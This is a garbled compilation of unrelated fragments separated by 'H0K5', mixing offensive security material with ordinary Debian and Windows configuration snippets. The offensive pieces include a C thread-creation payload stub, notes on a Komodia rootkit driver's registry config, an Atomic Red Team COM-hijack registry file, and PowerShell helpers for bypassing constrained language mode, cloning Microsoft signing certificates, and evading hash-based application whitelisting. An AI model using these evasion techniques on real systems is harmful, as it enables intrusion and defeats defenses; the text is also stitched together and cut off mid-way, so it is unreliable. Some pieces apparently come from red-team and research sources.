H0K5

void Payload() {
	DWORD threadId;
	CreateThread(
		NULL,                   // default security attributes
		0,                      // use default stack size  
		MyThreadFunction,       // thread function name
		NULL,          // argument to thread function 
		0,                      // use default creation flags 
		&threadId);
}

H0K5

First off: this is the first time I "seriously" reversed a kernel-mode NT driver, so keep that in mind when you read this..

The Komodia rootkit config is located in a certain registry entry that's hardcoded in the driver. For Qustodio, it's HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\qwd\Data.

The config structure is simple enough. An array of the following structure:

DWORD type;
BYTE unknown[32]; // I don't see anywhere that the driver actually *reads* any of this part,
 // at least, not after writing to it first.

H0K5

This article can also be found in Hack in the Box Magazine

##0x00 Abstract## Discretion is a necessity when performing a penetration test. The job is to test a network's defenses as well as the security team's ability to detect and respond to an incident, while being as discrete as possible. Neohapsis Labs looked into the obstacles and solutions for developing a communication channel with a device residing in a protected and monitored network. This paper will discuss these findings. A new tool demonstrating some of these techniques will also be discussed. This paper will also speculate as to defensive solutions for such threats.

##Table of Contents##

• 0x01 -- Introduction
• 0x02 -- Attacks and Defenses
• 0x02.01 -- Network Address Translation / Port Address Translation (NAT/PAT)
• 0x02.02 -- Ingress Port Filtering

H0K5

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]

H0K5

function Invoke-RunScriptHelperExpression {
<#
.SYNOPSIS

Executes PowerShell code in full language mode in the context of runscripthelper.exe.

.DESCRIPTION

Invoke-RunScriptHelperExpression executes PowerShell code in the context of runscripthelper.exe - a Windows-signed PowerShell host application which appears to be used for telemetry collection purposes. The PowerShell code supplied will run in FullLanguage mode and bypass constrained language mode.

H0K5

# We'll just store the cloned certificates in current user "Personal" store for now.
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' }

$MS_Root_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Root.cer
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation

$MS_PCA_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32PCA.cer
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation

$MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Leaf.cer

H0K5

function Copy-AuthenticodeSignedFile {
<#
.SYNOPSIS

Creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature.

.DESCRIPTION

Copy-AuthenticodeSignedFile creates a copy of an Authenticode-signed PowerShell file that has a unique file hash but retains its valid signature. This is used to bypass application whitelisting hash-based blacklist rules.

H0K5

mv /etc/apt/sources.list /etc/apt/sources.list,old
echo "deb http://deb.debian.org/debian stretch main" >> /etc/apt/sources.list
echo "deb-src http://deb.debian.org/debian stretch main" >> /etc/apt/sources.list

echo "deb http://deb.debian.org/debian stretch-updates main" >> /etc/apt/sources.list
echo "deb-src http://deb.debian.org/debian stretch-updates main" >> /etc/apt/sources.list

echo "deb http://security.debian.org/debian-security/ stretch/updates main" >> /etc/apt/sources.list
echo "deb-src http://security.debian.org/debian-security/ stretch/updates main" >> /etc/apt/sources.list

H0K5

################################################
# General Download, install, configure modules
################################################
$wd = $SCRIPT:MyInvocation.MyCommand.path | Split-Path -Parent

function new-restore(){
    enable-computerrestore -drive C:\
    checkpoint-computer -description "pre-pookiepack"
}

H0K5

#### Contents of the preconfiguration file (for jessie)
### Localization
# Preseeding only locale sets language, country and locale.
d-i debian-installer/locale string fr_FR

# The values can also be preseeded individually for greater flexibility.
#d-i debian-installer/language string en
#d-i debian-installer/country string NL
#d-i debian-installer/locale string en_GB.UTF-8
# Optionally specify additional locales to be generated.